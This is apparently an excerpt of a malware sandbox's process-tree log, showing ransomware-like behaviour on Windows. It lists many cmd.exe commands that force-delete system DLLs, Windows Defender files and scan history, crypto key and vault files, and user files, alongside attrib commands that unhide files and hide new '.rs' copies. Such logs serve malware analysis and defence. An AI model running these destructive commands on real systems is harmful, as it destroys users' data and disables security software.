C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\d1eb31e81aba7252cd685577e9fc3a5f\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Interop.Access.Dao\15.0.0.0__71e9bce111e9429c\Microsoft.Office.interop.access.dao.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2106.6-0\as-IN\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\f82b07010423cbe7b7b8280227d2f9d7\Microsoft.Management.Infrastructure.CimCmdlets.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\NTUSER.DAT.LOG1""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\ink\Alphabet.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Desktop\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Music\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Favorites\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\Favorites\desktop.ini.rs""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Favorites\desktop.ini.rs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Crypto\SystemKeys\e20a5d00f699f8b0d3cc797944b4c0cf_ff33445f-a36e-4a95-8e5f-bca99faf3ebd""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\apppatch\AcRes.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\Ole DB\msdadc.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Contacts\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""3⤵
-
C:\Windows\system32\attrib.exeattrib -h "C:\Program Files\desktop.ini"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Default\NTUSER.DAT.LOG1.rs""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Default\NTUSER.DAT.LOG1.rs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2106.6-0\ar-SA\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\msinfo32.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\1783997ceb5d95baa4a1676daac6d764\Microsoft.PowerShell.Workflow.ServiceCore.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\bcastdvr\broadcastpause720.h264""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\msinfo32.exe""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\msinfo32.exe"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\msadc\adcjavas.inc""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\ClickToRun\DeploymentConfig.0.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\Favorites\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\Favorites\desktop.ini"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\Extensibility\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_ff33445f-a36e-4a95-8e5f-bca99faf3ebd""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft OneDrive\setup\refcount.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\bfsvc.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOLoaderUI.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\D3DSCache\45a5e5b635b28e7a\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\Contacts\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\Admin\Contacts\desktop.ini"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Windows\apppatch\AcRes.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\System\Ole DB\msdadc.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\Desktop\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\Admin\Desktop\desktop.ini"4⤵
- Drops desktop.ini file(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\Music\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\Admin\Music\desktop.ini"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\tifffilt.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\en-US\wab32res.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Documents\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\tifffilt.dll""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\tifffilt.dll"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Crypto\SystemKeys\e20a5d00f699f8b0d3cc797944b4c0cf_ff33445f-a36e-4a95-8e5f-bca99faf3ebd""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Default\NTUSER.DAT.LOG1""3⤵
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Default\NTUSER.DAT.LOG1"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Windows\bcastdvr\broadcastpause720.h264""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\ado\adojavas.inc""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\c7fd929f8b3cb21f67fd6cb3f29da468\Microsoft.Management.Infrastructure.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35\Microsoft.ManagementConsole.Resources.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\MF\Pending.GRL""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\VGX.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Local\IconCache.db""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033\VSTOLoaderUI.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json.bk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\ClickToRun\DeploymentConfig.0.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\System\msadc\adcjavas.inc""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Program Files\Common Files\System\msadc\adcjavas.inc"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\System\Ole DB\en-US\msdaorar.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\Documents\desktop.ini.rs""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Documents\desktop.ini.rs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Diagnosis\AggregatorStorage\UpdateHeartbeatScan$""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Windows\bfsvc.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOLoader.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini"4⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\VSTO\vstoee100.tlb""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOLoader.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\VGX.dll""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\VGX.dll"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\System\en-US\wab32res.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\microsoft shared\ink\Alphabet.xml""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Program Files\Common Files\microsoft shared\ink\Alphabet.xml"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\wab32.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft OneDrive\setup\refcount.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_ff33445f-a36e-4a95-8e5f-bca99faf3ebd""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_ff33445f-a36e-4a95-8e5f-bca99faf3ebd"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini"4⤵
- Drops desktop.ini file(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\System\wab32.dll""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Program Files\Common Files\System\wab32.dll"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{3A53D230-71AE-42DC-B4A0-91363EBF0B8D}""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\Unknown.Log""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2106.6-0\az-Latn-AZ\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\25113e330dc8a2553e27060203c79b74\Microsoft.ManagementConsole.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0fe221090c7f0c513b31618eadb333f2\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\a0d62bfd8997614f9a63a4545a0cae3c\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\9d02ee4de46cba7ec1c9890b80045a2f\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2106.6-0\bg-BG\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f7bb4c71b47d5c67cb78c9e5bc6498a5\Microsoft.PowerShell.Core.Activities.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Interop.Graph\15.0.0.0__71e9bce111e9429c\Microsoft.Office.Interop.Graph.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Diagnosis\osver.txt""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Interop.Excel\15.0.0.0__71e9bce111e9429c\Microsoft.Office.Interop.Excel.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\3cef603f665e94a9f358f763f95140c3\Microsoft.Security.ApplicationId.Wizards.AutomaticRuleGenerationWizard.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\c0fb350c4beedf03c6b66e11606d704a\Microsoft.ApplicationId.RuleWizard.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\20e8e64282b64866288c5abe3726505d\Microsoft.ManagementConsole.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-909609370C487E78DE979D5EBA4DD3859F29B1B3.bin""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2106.6-0\bn-IN\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\mscomctl\10.0.4504.0__31bf3856ad364e35\__AssemblyInfo__.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\NTUSER.DAT{5da70f0b-eb4a-11eb-b8af-ceb2b35da2fd}.TM.blf.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\System\ado\adojavas.inc""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\Documents\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\Documents\desktop.ini"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\addins\FXSEXT.ecf""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Windows\addins\FXSEXT.ecf""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Windows\addins\FXSEXT.ecf"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Tools.Excel.v9.0\9.0.0.0__b03f5f7f11d50a3a\Microsoft.Office.Tools.Excel.v9.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\__AssemblyInfo__.ini""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\Contacts\desktop.ini"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\b6ff7e825864eaa8b8b158a69d007241\Microsoft.PowerShell.Commands.Diagnostics.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\2db6ff51f6f4c33d79910f94be2e6463\EventViewer.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Diagnosis\AggregatorStorage\FailoverSignalAggregator$""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\All Users\Microsoft\Diagnosis\AggregatorStorage\FailoverSignalAggregator$"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\NTUSER.DAT{5da70f0b-eb4a-11eb-b8af-ceb2b35da2fd}.TMContainer00000000000000000001.regtrans-ms.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\MSBuild\3.5.0.0__b03f5f7f11d50a3a\msbuild.exe.config""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\28f99753c66a6bdafe49d6671a58883f\Microsoft.ApplicationId.Framework.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Diagnosis\AggregatorStorage\FailoverSignalAggregator$""3⤵
-
